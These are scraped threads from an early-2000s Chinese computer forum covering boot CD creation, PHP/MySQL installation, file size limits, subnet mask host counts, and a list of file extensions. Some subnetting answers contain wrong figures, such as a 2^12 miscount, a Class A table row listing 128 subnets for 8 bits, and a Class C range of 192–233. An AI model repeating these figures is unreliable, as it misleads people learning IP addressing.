    3、根据需要修改软盘上的系统配置文件config.sys、autoexec.bat，如无特殊需要可不修改。注意：最好别用format a: /s 命令来制作，那样太麻烦。
    制作启动光盘
    这里用adaptec's easy cd－creator光盘刻录软件来制作：
    1、将上一步制作的软盘启动盘插入软驱；
    2、启动adaptecs easy cd－creator，单击 file菜单中的cd layout properties，输入光盘的卷标比如bootcd，然后单击“data settings”标签，文件系统选择默认的iso9660，选中“bootable”选项，确定，系统会提示你插入启动软盘，单击“ok”，系统会依照启动软盘上的内容在光盘的内容区窗口中自动生成两个文件bootcat.bin，bootimg.bin。
    3、从上面的浏览器窗口中拖动你要刻录到光盘上的其他文件到右下角的光盘内容窗口中。
    4、检查光盘中的内容及目录结构，无误后按下刻录按钮即可刻录出一张引导光盘。这里要注意的是较早版本的adaptec's easy cd－creator软件不支持目前市面上有些刻录机，你需要到http://www.adaptec.com网站上下载相应的补丁程序。

如果用NERO软件刻录
nero在开始就选择“启动光盘bootcd”再进入，当刻录时放入启动软盘就行了。

[这消息被yunbin编辑过(编辑时间2001-12-03 12:23:56)]

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

阿P

@1981
积分：1289
发帖：539
来自：@1981.COM
注册：2000-11-03
 发表于 2001-12-03 13:38:15 按此观看阿P的个人资料 按此发邮件给阿P 访问阿P的主页 阿P 的 oicq 是223607,查看 223607 的资料 发送悄悄话给阿P 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看阿P的IP
谢谢

我搞定了。

www.@1981.com
上一贴 | 下一贴
快速回复 | 主题：如何制作光盘启动盘？急！谢谢
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


怎样在windows下安装php与mysql?

计算机技术
怎样在windows下安装php与mysql?

上一贴 | 下一贴
发表人 | 主题: 怎样在windows下安装php与mysql?
gen2 初级用户 积分：10 发帖：5 来自： 注册：2001-11-16 | 发表于 2001-11-27 15:43:53 按此观看gen2的个人资料 按此发邮件给gen2 收藏该主题供以后查看 发送悄悄话给gen2 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看gen2的IP 怎样在windows下安装php与mysql? 如果可以的话请详细一点!
yunbin 经典强盗 现任版主 积分：2292 发帖：1001 来自：火星 注册：2001-09-27 | 发表于 2001-11-27 17:28:52 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP 这里查看 A man can succeed at almost anything for which he has unlimited enthusiasm. Blueidea Web Team Moderator Of Computer Technology Forum
上一贴 | 下一贴
快速回复 | 主题：怎样在windows下安装php与mysql?
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


怎样上传超限文件?

计算机技术
怎样上传超限文件?

上一贴 | 下一贴
发表人 主题: 怎样上传超限文件?
cloudsea2001

初级用户
积分：3
发帖：2
来自：pds.ha.cn
注册：2001-11-13
 发表于 2001-12-04 16:50:46 按此观看cloudsea2001的个人资料 按此发邮件给cloudsea2001 访问cloudsea2001的主页 cloudsea2001 的 oicq 是17515708,查看 17515708 的资料 收藏该主题供以后查看 发送悄悄话给cloudsea2001 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看cloudsea2001的IP
51的限制是1.2M，网易的更小。我的页上有一个1.5M的flash动画，怎么办呢？如果用软件分割了，怎么在远程组合呢？还有没有其他什么好办法？

I want to top ......
myhyli

现任版主
积分：20379
发帖：4790
来自：
注册：2000-07-22
 发表于 2001-12-04 16:56:12 按此观看myhyli的个人资料 按此发邮件给myhyli 发送悄悄话给myhyli 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看myhyli的IP
winzip分割文件压缩

Myhyli
www.blueidea.com/user/myhyli

Blueidea Web Team
Moderator Of Dreamweaver & Javascript

maobi

初级用户
积分：117
发帖：30
来自：浙江江山
注册：2000-12-04
 发表于 2002-04-19 16:21:49 按此观看maobi的个人资料 按此发邮件给maobi 发送悄悄话给maobi 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看maobi的IP
myhyli在上个帖子中说
引用:
winzip分割文件压缩

庸医一个！！

正确的方法的写一封感天动地的信给51或网易的管理员。如果你福星高照的话，他们可能会对你开开后门。

:::::我静静的看着这个世界:::::
上一贴 | 下一贴
快速回复 | 主题：怎样上传超限文件?
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


关于子网掩码换算最大主机数的问题？

计算机技术
关于子网掩码换算最大主机数的问题？

上一贴 | 下一贴
发表人 主题: 关于子网掩码换算最大主机数的问题？
audreys

终级用户
积分：658
发帖：175
来自：js.lyg
注册：2000-11-07
 发表于 2001-11-21 13:53:08 按此观看audreys的个人资料 按此发邮件给audreys 访问audreys的主页 audreys 的 oicq 是57659189,查看 57659189 的资料 收藏该主题供以后查看 发送悄悄话给audreys 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看audreys的IP
请问给一子网掩码如何知道它的最大主机数？
如：255.255.205.0的子网掩码她的主机数最大是多少呢？如何换算？

痛并傻笑着！
icefly

初级用户
积分：85
发帖：37
来自：
注册：2001-08-14
 发表于 2001-11-21 14:04:15 按此观看icefly的个人资料 按此发邮件给icefly icefly 的 oicq 是16640259,查看 16640259 的资料 发送悄悄话给icefly 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看icefly的IP
将子网隐码的0数－2就是主机个数。即是2的（零的个数次方）－2。

：：远看一只花
：：近看还是花
：：再近一点还是花
：：×￥◎！￥％……％有完没完？我当然是花
有时好心的坏蛋

终级用户
积分：715
发帖：243
来自：广东
注册：2001-11-20
 发表于 2001-11-21 18:26:59 按此观看有时好心的坏蛋的个人资料 按此发邮件给有时好心的坏蛋 访问有时好心的坏蛋的主页 有时好心的坏蛋 的 oicq 是7658826,查看 7658826 的资料 发送悄悄话给有时好心的坏蛋 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看有时好心的坏蛋的IP
255.255.205先用计算器变为二进制是11111111.11111111.11001101。
取前面18个1.因为ip地址是：网络上唯一的32位逻辑地址，
所以32-18=14.
所以其子网掩码的总主机数为2的12次方=（4096）台主机.
有什么疑问可以去我的主页给我留言。
http://xymily.go.163.com

这家伙很懒，什么也没有留下

http://idiot.sharella.com

有时好心的坏蛋

终级用户
积分：715
发帖：243
来自：广东
注册：2001-11-20
 发表于 2001-11-21 18:29:38 按此观看有时好心的坏蛋的个人资料 按此发邮件给有时好心的坏蛋 访问有时好心的坏蛋的主页 有时好心的坏蛋 的 oicq 是7658826,查看 7658826 的资料 发送悄悄话给有时好心的坏蛋 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看有时好心的坏蛋的IP
255.255.205先用计算器变为二进制是11111111.11111111.11001101。
取前面18个1.因为ip地址是：网络上唯一的32位逻辑地址，
所以32-18=14.
所以其子网掩码的总主机数为2的14次方=（16384）台主机.
有什么疑问可以去我的主页给我留言。
http://xymily.go.163.com
对不起，刚才按错了数：P

这家伙很懒，什么也没有留下

http://idiot.sharella.com

audreys

终级用户
积分：658
发帖：175
来自：js.lyg
注册：2000-11-07
 发表于 2001-11-21 18:38:56 按此观看audreys的个人资料 按此发邮件给audreys 访问audreys的主页 audreys 的 oicq 是57659189,查看 57659189 的资料 发送悄悄话给audreys 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看audreys的IP
？？？
哪一个才是对的呀？

痛并傻笑着！
啸

无意
现任版主
积分：5736
发帖：1962
来自：
注册：2000-08-01
 发表于 2001-11-21 19:13:22 按此观看啸的个人资料 按此发邮件给啸 发送悄悄话给啸 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看啸的IP
公式： 子网中的主机数=2^n -2 n为主机ID占用的位数（我看好象就是看后面零的个数，比如255．255．255．252，后面零的个数是2，n就取二）

下面是一个A、B、C三类网络子网数目与子网掩码的转换表，建议你根据上面的公式拿一些小的数来算一下就会明白了。

A类：

子网数目 占用位数　　　　子网掩码　　　　子网中主机数
  2　　　　　1　　　　255．128．0．0　　　　8,388,606
  4　　　　　2　　　　255．192．0．0　　　　4,194,302
  8　　　　　3　　　　255．224．0．0　　　　2,097,150
  16　　　　 4　　　　255．240．0．0　　　　1,048,574
  32　　　　 5　　　　255．248．0．0　　　　524,286
  64　　　　 6　　　　255．252．0．0　　　　262,142
  128　　　　7　　　　255．254．0．0　　　　131,070
  128　　　　8　　　　255．255．0．0　　　　65,534

B类：

子网数目 占用位数　　　　子网掩码　　　　子网中主机数
  2　　　　　1　　　　255．255．128．0　　　32,766
  4　　　　　2　　　　255．255．192．0　　　16,382
  8　　　　　3　　　　255．255．224．0　　　8,190
  16　　　　 4　　　　255．255．240．0　　　4,094
  32　　　　 5　　　　255．255．248．0　　　2,046
  64　　　　 6　　　　255．255．252．0　　　1,022
  128　　　　7　　　　255．255．254．0　　　510
  256　　　　8　　　　255．255．255．0　　　254

C类：

子网数目 占用位数　　　　子网掩码　　　　子网中主机数
  2　　　　　1　　　　255．255．255．128　　　126
  4　　　　　2　　　　255．255．255．192　　　62
  8　　　　　3　　　　255．255．255．224　　　30
  16　　　　 4　　　　255．255．255．240　　　14
  32　　　　 5　　　　255．255．255．248　　　6
  64　　　　 6　　　　255．255．255．252　　　2

Blueidea Web Team.
Moderator Of Computer Technology Forum
啸

无意
现任版主
积分：5736
发帖：1962
来自：
注册：2000-08-01
 发表于 2001-11-21 19:35:49 按此观看啸的个人资料 按此发邮件给啸 发送悄悄话给啸 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看啸的IP
再算算发现我那看零的偷懒的方法好象是不大管用，让我再想想

Blueidea Web Team.
Moderator Of Computer Technology Forum
icefly

初级用户
积分：85
发帖：37
来自：
注册：2001-08-14
 发表于 2001-11-21 21:57:13 按此观看icefly的个人资料 按此发邮件给icefly icefly 的 oicq 是16640259,查看 16640259 的资料 发送悄悄话给icefly 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看icefly的IP
有时好心的坏蛋在上个帖子中说
引用:
255.255.205先用计算器变为二进制是11111111.11111111.11001101。
取前面18个1.因为ip地址是：网络上唯一的32位逻辑地址，
所以32-18=14.
所以其子网掩码的总主机数为2的14次方=（16384）台主机.
有什么疑问可以去我的主页给我留言。
http://xymily.go.163.com
对不起，刚才按错了数：P

还要－2，原因是ip全为0的主机和全为1的主机保留。

：：远看一只花
：：近看还是花
：：再近一点还是花
：：×￥◎！￥％……％有完没完？我当然是花
shiny

初级用户
积分：58
发帖：21
来自：阳光地带
注册：2001-11-01
 发表于 2001-11-22 08:51:17 按此观看shiny的个人资料 按此发邮件给shiny 发送悄悄话给shiny 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看shiny的IP
这个子网掩码真是奇怪！！
我觉得应该是前面全1，与ip地址and以后定位网络号；后面全0，与ip地址and以后定位主机号，怎么有这样的子网掩码阿？
望高手指点！！

成长，就是乘着心灵微弱的光芒学会飞翔……
嘿嘿

坏笑
积分：403
发帖：524
来自：
注册：2001-10-06
 发表于 2001-11-22 09:00:52 按此观看嘿嘿的个人资料 按此发邮件给嘿嘿 嘿嘿 的 oicq 是42323447,查看 42323447 的资料 发送悄悄话给嘿嘿 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看嘿嘿的IP
shiny在上个帖子中说
引用:
这个子网掩码真是奇怪！！
我觉得应该是前面全1，与ip地址and以后定位网络号；后面全0，与ip地址and以后定位主机号，怎么有这样的子网掩码阿？
望高手指点！！

说实话，我也觉得奇怪。

缘是天定,份在人为.
icefly

初级用户
积分：85
发帖：37
来自：
注册：2001-08-14
 发表于 2001-11-23 12:51:31 按此观看icefly的个人资料 按此发邮件给icefly icefly 的 oicq 是16640259,查看 16640259 的资料 发送悄悄话给icefly 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看icefly的IP
不好意思，前几次没看到提出的个数字就是隐码，我还以为是ip地址呢。我的观点是这样的隐码是不可能存在的，不可能有这样的子网隐码，因为这个根本不符合规定的。隐码应该必须前面全为1，中间不应该有0的。不知道我说得对不对？

[这消息被icefly编辑过(编辑时间2001-11-23 12:52:19)]

：：远看一只花
：：近看还是花
：：再近一点还是花
：：×￥◎！￥％……％有完没完？我当然是花
ladeng

初级用户
积分：94
发帖：44
来自：山东
注册：2001-09-21
 发表于 2001-11-23 15:03:12 按此观看ladeng的个人资料 按此发邮件给ladeng 访问ladeng的主页 发送悄悄话给ladeng 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ladeng的IP
啸你好，你那个子网数目和占用位数是什么意思呀？

俺是来学习的：）
yunbin

经典强盗
现任版主
积分：2292
发帖：1001
来自：火星
注册：2001-09-27
 发表于 2001-11-23 15:23:47 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
ladeng在上个帖子中说
引用:
啸你好，你那个子网数目和占用位数是什么意思呀？

IP地址与子网掩码：
    1、IP地址：
    Internet网是由不同物理网络互连而成，不同网络之间实现计算机的相互通信必须有相应的地址标识，这个地址标识称为IP地址。IP地址提供统一的地址格式即由32Bit位组成，由于二进制使用起来不方便，用户使用“点分十进制”方式表示。IP地址唯一的标识出主机所在的网络和网络中位置的编号，按照网络规模的大小，常用IP地址分为以下三类：
    A：这类地址的特点是以0开头，第一字节表示网络号，第二、三、四字节表示网络中的主机号，网络数量少，最多可以表示126个网络号，每一网络中最多可以有16777214个主机号。

0******* ******** ******** ********
l—126 0—255 0—255 1—254

    B：这类地址的特点是以l0开头，第一、二字节表示网络号，第二、三字节表示网络中的主机号，最多可以表示16384个网络号，每一网络中最多可以有66534个主机号。

10****** ******** ******** ********
128一191 0—255 0—255 1—254

    C：这类地址的特点是以110开头，第一、二、三字节表示网络号，第四字节表示网络中的主机号，网络数量比较多，可以有2097152个网络号，每一网络中最多可以有254个主机号。

110***** ******** ******** ********
192—233 0—255 0—255 1—254

    IP地址规定：
    网络号不能以127开头，第一字节不能全为0，也不能全为l。
    主机号不能全为0，也不能全为l。

    2、为了快速确定IP地址的哪部分代表网络号，哪部分代表主机号，判断两个IP地址是否属于同一网络,就产生的子网掩码的概念，子网掩码按IP地址的格式给出。 A、B、C类IP地址的默认子网掩码如下：

A： 255．O．O．0
B： 255．255．0．O
C： 255．255.255．0

    用子网掩码判断IP地址的网络号与主机号的方法是用IP地址与相应的子网掩码 进行与运算，可以区分出网络号部分和主机号部分。
    如10.68.89.1是A类IP地址，所以默认子网掩码为255．0．0，O，分别转化为二进制进行与运算后，得出网络号为10。再如202．30．152.3和202．30．152．80为C类 IP地址，默认子网掩码为255．255．255．0，进行与运算后得出二者网络号相同，说明两主机位于同一网络。
    子网掩码的另一功能是用来划分子网。在实际应用中，经常遇到网络号不够的问题，需要把某类网络划分出多个子网，采用的方法就是将主机号标识部分的一些二进制位划分出来用来标识子网。

    3、网关地址：在Internet网中，网关是一种连接内部网与Internet上其它网的中间设备，也称“路由器”。网关地址是可以理解为内部网与Internet网信息传输的通道地址。

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

嘿嘿

坏笑
积分：403
发帖：524
来自：
注册：2001-10-06
 发表于 2001-11-23 16:35:13 按此观看嘿嘿的个人资料 按此发邮件给嘿嘿 嘿嘿 的 oicq 是42323447,查看 42323447 的资料 发送悄悄话给嘿嘿 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看嘿嘿的IP
icefly在上个帖子中说
引用:
不好意思，前几次没看到提出的个数字就是隐码，我还以为是ip地址呢。我的观点是这样的隐码是不可能存在的，不可能有这样的子网隐码，因为这个根本不符合规定的。隐码应该必须前面全为1，中间不应该有0的。不知道我说得对不对？

IP协议关于子网掩码的定义提供一种有趣的灵活性，允许子网掩码中的“0”和“1”位不连续。但是，这样的子网掩码给分配主机地址和理解寻径表都带来一定困难，并且，极少的路由器支持在子网中使用低序或无序的位，因此在实际应用中通常各网点采用连续方式的子网掩码。像255.255.255.64和255.255.255.160等一类的子网掩码不推荐使用。

缘是天定,份在人为.
maobi

初级用户
积分：117
发帖：30
来自：浙江江山
注册：2000-12-04
 发表于 2002-04-19 16:17:05 按此观看maobi的个人资料 按此发邮件给maobi 发送悄悄话给maobi 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看maobi的IP
嘿嘿在上个帖子中说
引用:
icefly在上个帖子中说
引用:
不好意思，前几次没看到提出的个数字就是隐码，我还以为是ip地址呢。我的观点是这样的隐码是不可能存在的，不可能有这样的子网隐码，因为这个根本不符合规定的。隐码应该必须前面全为1，中间不应该有0的。不知道我说得对不对？

IP协议关于子网掩码的定义提供一种有趣的灵活性，允许子网掩码中的“0”和“1”位不连续。但是，这样的子网掩码给分配主机地址和理解寻径表都带来一定困难，并且，极少的路由器支持在子网中使用低序或无序的位，因此在实际应用中通常各网点采用连续方式的子网掩码。像255.255.255.64和255.255.255.160等一类的子网掩码不推荐使用。

因此，数0算主机的方法是对的。不连续的掩码在局域网中，用来防止大家擅自改换ip是有趣的。
一般选择掩码的方法是，根据2^n>N+2的原则（N为主机数目），算出n的值，n即为掩码后面0的个数。然后把32位2进制转换为相应的十进制就可以了。

:::::我静静的看着这个世界:::::
上一贴 | 下一贴
快速回复 | 主题：关于子网掩码换算最大主机数的问题？
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


通用文件扩展名详细列表

计算机技术
通用文件扩展名详细列表

上一贴 | 下一贴
发表人 主题: 通用文件扩展名详细列表
yunbin

经典强盗
现任版主
积分：2292
发帖：1001
来自：火星
注册：2001-09-27
 发表于 2001-11-24 09:33:07 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 收藏该主题供以后查看 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
看到有很多朋友来问是各种后缀是什么类型的文件 特贴出如下列表

下面的列表包括常见文件扩展名和它们的说明。这些类型的文件在你的系统环境中会经常看到与使用。当建立一个备份用户数据的过程时，可以参阅这个列表来决定哪个文件的扩展名可以包括，哪个要去掉。下面列出的文件扩展名还没有包括所有的—毕竟实际应用中大约有超过50 000多种文件扩展名，试试自己计算一下有三个字母或少于三个字母的扩展名的数量—但下面的列举对一般应用已经足够了。

扩 展 名　　 描 述
A 对象代码库文件
AAM Authorware shocked文件
AAS Authorware shocked包
ABF Adobe二进制屏幕字体
ABK CorelDRAW自动备份文件
ABS 该类文件有时用于指示一个摘要（就像在一篇有关科学方面的文章的一个摘要或概要，取自abstract）
ACE Ace压缩档案格式
ACL CorelDRAW 6键盘快捷键文件
ACM Windows系统目录文件
ACP Microsoft office助手预览文件
ACR 美国放射医学大学文件格式
ACT Microsoft office助手文件
ACV OS/2的驱动程序，用于压缩或解压缩音频数据
AD After Dark屏幕保护程序
ADA Ada源文件（非-GNAT）
ADB Ada源文件主体（GNAT）；HP100LX组织者的约定数据库
ADD OS/2用于引导过程的适配器驱动程序
ADF Amiga磁盘文件
ADI AutoCAD设备无关二进制绘图仪格式
ADM After Dark多模块屏幕保护；Windows NT策略模板
ADP FaxWork用于传真调制解调器的交互安装文件；Astound Dynamite文件
ADR After Dark随机屏幕保护；Smart Address的地址簿
ADS Ada源文件说明书（GNAT）
AFM Adobe的字体尺度
AF2，AF3 ABC的FlowChat文件
AI Adobe Illustrator格式图形
AIF，AIFF 音频互交换文件，Silicon Graphic and Macintosh应用程序的声音格式
AIFC 压缩AIF
AIM AOL即时信息传送
AIS ACDSee图形序列文件；Velvet Studio设备文件
AKW RoboHELP的帮助工程中所有A-关键词
ALAW 欧洲电话音频格式
ALB JASC Image Commander相册
ALL 艺术与书信库
AMS Velvet Studio音乐模块（MOD）文件；Extreme的Tracker模块文件
ANC Canon Computer的调色板文件，包含一系列可选的颜色板
ANI Windows系统中的动画光标
ANS ANSI文本文件
ANT SimAnt For Windows中保存的游戏文件
API Adobe Acrobat使用的应用程序设计接口文件
APR Lotus Approach 97文件
APS Microsoft Visual C++文件
ARC LH ARC的压缩档案文件
ARI Aristotle声音文件
ARJ Robert Jung ARJ压缩包文件
ART Xara Studio绘画文件；Canon Crayola美术文件；Clip Art文件格式；另一种光线跟踪格式；AOL使用的用Johnson—Grace压缩算法压缩的标记文件
ASA Microsoft Visual InterDev文件
ASC ASCⅡ文本文件；PGP算法加密文件
ASD Microsoft Word的自动保存文件；Microsoft高级流媒体格式（microsoft advanced streaming format，ASF）的描述文件；可用NSREX打开 Velvet Studio例子文件
ASE Velvet Studio采样文件
ASF Microsoft高级流媒体格式文件
ASM 汇编语言源文件，Pro/E装配文件
ASO Astound Dynamite对象文件
ASP 动态网页文件；ProComm Plus安装与连接脚本文件；Astound介绍文件
AST Astound多媒体文件；ClarisWorks“助手”文件
ASV DataCAD自动保存文件
ASX Cheyenne备份脚本文件；Microsoft高级流媒体重定向器文件，视频文件
ATT AT&LT Group 4位图文件
ATW 来自个人软件的Any Time Deluxe For Windows个人信息管理员文件
AU Sun/NeXT/DEC/UNIX声音文件；音频U-Law（读作“mu-law”）文件格式
AVB Computer Associates Inoculan反病毒软件的病毒感染后文件
AVI Microsoft Audio Video Interleave电影格式
AVR Audio Visual Research文件格式
AVS 应用程序可视化格式
AWD FaxVien文档
AWR Telsis数字储存音频文件扩展名格式
Axx ARJ压缩文件的分包序号文件，用于将一个大文件压至几个小的压缩包中（xx取01-99的数字）
A3L Authorware 3.x库文件
A4L Authorware 4.x库文件
A5L Authorware 5.x库文件
A3M，A4M Authorware Macintosh未打包文件
A4P Authorware无运行时间的打包文件
A3W，A4W，A5W 未打包的Authorware Windows文件
BAK 备份文件
BAS BASIC源文件
BAT 批处理文件
BDF West Point Bridger Designer文件
BFC Windows 95 Briefcase文档
BG Backgammon For Windows下的游戏文件
BGL Microsoft Flight Simulator（微软飞行模拟器）的视景文件
BI 二进制文件
BIF Group Wise的初始化文件
BIFF XLIFE 3D格式文件
BIN 二进制文件
BK，BK$ 有时用于代表备份版本
BKS IBM BookManager Read书架文件
BMK 书签文件
BMP Windows或OS/2位图文件
BMI Apogee BioMenace数据文件
BOOK Adobe FrameMaker Book文件
BOX Lotus Notes的邮箱文件
BPL Borlard Delph 4打包库
BQY BrioQuery文件
BRX 用于查看多媒体对象目录的文件
BSC MS Developer Studio浏览器信息文件
BSP Quake图形文件
BS1 Apogee Blake Stone数据文件
BS_ Microsoft Bookshelf Find菜单外壳扩展名
BTM Norton 应用程序使用的批处理文件
BUD Quicken的备份磁盘
BUN CakeWalk 声音捆绑文件(一种MIDI程序)
BW SGI黑白图像文件
BWV 商业波形文件
BYU BYU的电影文件格式
B4 Helix Nuts and Bolts文件
C C代码文件
C0l 台风波形文件
CAB Microsoft压缩档案文件
CAD Softdek的Drafix CAD文件
CAL CALS压缩位图；日历计划表数据
CAM Casio照相机格式
CAP 压缩音乐文件格式
CAS 逗号分开的ASCⅡ文件
CAT Quicken使用 的IntellCharge分类文件
CB Microsoft干净引导文件
CBI 二进制卷格式文件(用于IBM大型机系统)
CC Visual dBASE用户自定义类文件
CCA cc：邮件文件
CCB Visual Basic动态按钮配置文件
CCF 多媒体查看器配置文件，用于OS/2
CCH Corel图表文件
CCM Lotus cc：邮箱（例如“INBOX.CCM”）
CCO CyberChat数据文件
CCT Macromedia Director Shockwave投影
CDA CD音频轨道
CDF Microsoft频道定义格式文件
CDI Philip的高密盘交互格式
CDM Visual dBASE自定义数据模块文件
CDR CorelDRAW绘图文件；原始音频CD数据文件
CDT CorelDRAW模板
CDX CorelDRAW压缩绘图文件；Microsoft Visual FoxPro索引文件
CEL CIMFast事件语言文件
CER 证书文件（MIME x-x509-ca-cert）
CFB Compton的多媒文件
CFG 配置文件
CFM CotdFusion模板文件；Visual dBASE Windows用户定制表单
CGI 公共网关接口脚本文件
CGM 计算机图形元文件
CH OS/2配置文件
CHK 由Windows磁盘碎片整理器或磁盘扫描保存的文件碎片
CHM 编译过的HTML文件
CHR 字符集（字体文件）
CHP Ventura Publisher章节文件
CHT ChartViem文件；Harvard Graphics矢量文件
CIF Adaptec CD 创建器 CD映像文件
CIL Clip Gallery下载包
CIM SimCity 2000文件
CIN OS/2改变控制文件用于跟踪INI文件中的变化
CK1 iD/Apogee Commander Keen 1数据文件
CK2 iD/Apogee Commander Keen 2数据文件
CK3 iD/Apogee Commander Keen 3数据文件
CK4 iD /Apogee Commander Keen 4数据文件
CK5 iD /Apogee Commander Keen 5数据文件
CK6 iD /Apogee Commander Keen 6数据文件
CLASS Java类文件
CLL Crick Software Clicker文件
CLP Windows 剪贴板文件
CLS Visual Basic类文件
CMD Windows NT，OS/2的命令文件；DOS CD/M命令文件；dBASEⅡ程序文件
CMF Corel元文件
CMG Chessmaster保存的游戏文件
CMP JPEG位图文件；地址文档
CMV Corel Move动画文件
CMX Corel Presentation Exchange图像
CNF Telnet，Windows和其他其内格式会发生改变的应用程序使用的配置文件
CNM Windows应用程序菜单选项和安装文件
CNQ Compuworks Design Shop文件
CNT Windows（或其他）系统用于帮助索引或其他目的内容文件
COB TrueSpace 2对象文件
COD Microsoft C编译器产生的可显示机器码/汇编代码文件，其中附有源C代码作为注释
COM 命令文件（程序）
CPD Corel Print Office文件（图形）
CPD，CPE 传真覆盖文档
CPI Microsoft MS-DOS代码页信息文件
CPL 控制面板扩展名，Corel颜色板
CPO Corel打印存储文件
CPP C++代码文件
CPR Corel提供说明书文件
CPT Corel 照片-绘画图像
CPX Corel Presentation Exchange压缩图形文件
CRD Windows Cardfile文件
CRP Corel 提供的运行时介绍文件；Visual dBASE自定义报表文件
CRT 认证文件
CSC Corel脚本文件
CSP PC Emcee On_Screen图像
CSS 瀑布式表格文件
CST Macromedia Director Cast文件
CSV 逗号分隔的值文件
CT Scitex CT位图文件；Paint Shop Pro Grapic编辑器文件
CTL 通常用于表示一个包含控件信息的文件；FaxWork用它来保持有关每个传真收到或发出的信息
CUE Microsoft提示牌数据文件
CUR Windows光标文件
CUT Dr Halo位图文件
CV Corel版本的档案文件；Microsoft CodeView信息屏幕文件
CWK ClarisWorks数据文件.
CWS ClarisWorks模块
CXT Macromedia Director受保护的（不可编辑的）投影文件
CXX C++源代码文件
DAT 数据文件；WrodPerfect合并数据文件；用于一些MPEG格式的文件
DB Borland的Paradox 7表
DBC Microsoft Visual FoxPro数据库容器文件
DBF dBASE文件，一种由Ashton-Tate创建的格式，可以被ACT！、Lipper、FoxPro、Arago、Wordtech、Xbase和类似数据库或与数据库有关产品识别；可用数据文件（能被Excel 97打开）；Oracle 8.1.x表格空间文件
DBX DataBearn图像；Microsoft Visual FoxPro表格文件
DCM DCM模块格式文件
DCR 冲击波文件
DCS 桌面颜色分隔文件
DCT Microsoft Visual FoxPro数据库容器
DCU Delphi编译单元文件
DCX Microsoft Visual FoxPro数据库容器；基于PCX的传真图像；宏
DC5 DataCAD绘图文件
DDF Btrieve或Xtrieve数据定义文件，它包含用于描述Btrieve或Xtrieve文件的元数据
DDIF Digital Equipment或 Compaq格式，用于保存他们图像与字处理文档
DEF SmartWareⅡ数据文件；C++模块定义文件
DEFI Oracle 7 卸载脚本文件
DEM 用于表示数字高度模型的USGS基准的文件
DER 认证文件
DEWF Macintosh Sound Cap/Sound Edit录音设备格式
DGN Macintosh 95 CAD绘图文件
DIB 设备无关位图
DIC 目录
DIF 可进行数据互换的电子表格
DIG DigiLink格式；Sound DesignerⅠ音频文件
DIR MacromediaDirector文件
DIZ 描述文件
DLG C++对话框脚本文件
DLL 动态链接库
DLS 可下载声音文件
DMD Visual dBASE数据模块文件
DMF X-Trakker音乐模块（MOD）文件
DOC FrameMaker或FrameBuilder文档；Word Star文档、Word Perfect文档、Microsoft Word文档；DisplayWrite文档
DOT Microsoft Word文档模板
DPL Borland Delph3压缩库
DPR Borland Delphi工程头文件
DRAW Acorn的基于对象的矢量图像文件
DRV 驱动程序
DRW Micrografx Designer/Draw；Pro/E绘画文件
DSF Micrografx Designer VFX文件
DSG DOOM保存的文件
